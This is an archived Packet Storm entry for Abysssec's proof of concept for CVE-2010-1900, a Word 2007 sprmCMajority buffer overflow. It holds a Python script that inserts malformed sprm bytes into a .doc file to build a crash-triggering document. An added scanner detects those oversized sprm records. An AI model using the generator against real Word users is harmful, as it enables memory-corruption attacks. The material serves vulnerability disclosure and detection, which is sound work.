Packet Storm | Abysssec | PACKETSTORM:93715 | Sep 11, 2010

Month Of Abysssec Undisclosed Bugs - Microsoft Word

Source: packetstormsecurity.com

EPSS: 0.695 (Medium), percentile 97.7%

```python
'''
  __  __  ____         _    _ ____
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/

http://www.exploit-db.com/moaub11-microsoft-office-word-sprmcmajority-buffer-overflow/
http://www.exploit-db.com/sploits/moaub-11-exploit.zip
'''

'''
Title : Microsoft Office Word sprmCMajority buffer overflow
Version : Word 2007 SP 2
Analysis : http://www.abysssec.com
Vendor : http://www.microsoft.com
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-1900

'''

import sys

def main():

    try:
        fdR = open('src.doc', 'rb+')
        strTotal = fdR.read()
        str1 = strTotal[:4082]
        str2 = strTotal[4088:]

        sprmCMajority = "\x47\xCA\xFF" # sprmCMajority
        sprmPAnld80 = "\x3E\xC6\xFF" # sprmPAnld80

        fdW = open('poc.doc', 'wb+')
        fdW.write(str1)
        fdW.write(sprmCMajority)
        fdW.write(sprmPAnld80)
        fdW.write(str2)

        fdW.close()
        fdR.close()
        print '[-] Word file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)

if __name__ == '__main__':
    main()
```
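
A defensive counterpart to the PoC above, added here as an example and not part of the original advisory or Abysssec's code: it decodes the two sprm opcodes into their bit fields and flags any occurrence whose operand-length byte is as large as the 0xFF the PoC writes. The function names, the threshold default and the sample buffers are assumptions constructed for illustration; the bit layout is the Sprm structure from Microsoft's MS-DOC specification.

```python
import struct

# The two opcodes the PoC writes, stored little-endian on disk.
SPRMS = {0xCA47: "sprmCMajority", 0xC63E: "sprmPAnld80"}

def decode_sprm(opcode):
    """Split a 16-bit sprm into its bit fields (layout per MS-DOC 'Sprm')."""
    return {
        "ispmd": opcode & 0x01FF,       # property index
        "fSpec": (opcode >> 9) & 0x1,   # property needs special handling
        "sgc": (opcode >> 10) & 0x7,    # 1 = paragraph, 2 = character
        "spra": (opcode >> 13) & 0x7,   # 6 = variable-length operand
    }

def scan_for_oversized_sprms(data, threshold=0xFF):
    """Return sorted (offset, name, declared_len) for each watched sprm whose
    one-byte operand length is >= threshold (assumed default: the PoC's 0xFF).
    This is a raw byte scan that does not walk the compound file, so hits are
    triage leads rather than verdicts."""
    hits = []
    for opcode, name in SPRMS.items():
        if decode_sprm(opcode)["spra"] != 6:
            continue                    # only variable-length sprms carry a size byte
        needle = struct.pack("<H", opcode)
        pos = data.find(needle)
        while pos != -1:
            if pos + 2 < len(data) and data[pos + 2] >= threshold:
                hits.append((pos, name, data[pos + 2]))
            pos = data.find(needle, pos + 1)
    return sorted(hits)

# Constructed sample buffers (not real documents): padding around sprm bytes.
BENIGN = b"\x00" * 16 + b"\x47\xCA\x04" + b"\x00" * 12
PATCHED = b"\x00" * 16 + b"\x47\xCA\xFF" + b"\x3E\xC6\xFF" + b"\x00" * 8

if __name__ == "__main__":
    for label, buf in (("benign", BENIGN), ("patched", PATCHED)):
        for off, name, size in scan_for_oversized_sprms(buf):
            print("%s: %s at offset %d declares %d operand bytes"
                  % (label, name, off, size))
```

Run over real files, the scan needs the bytes of the document streams; a hit only marks an offset worth inspecting with a proper MS-DOC parser.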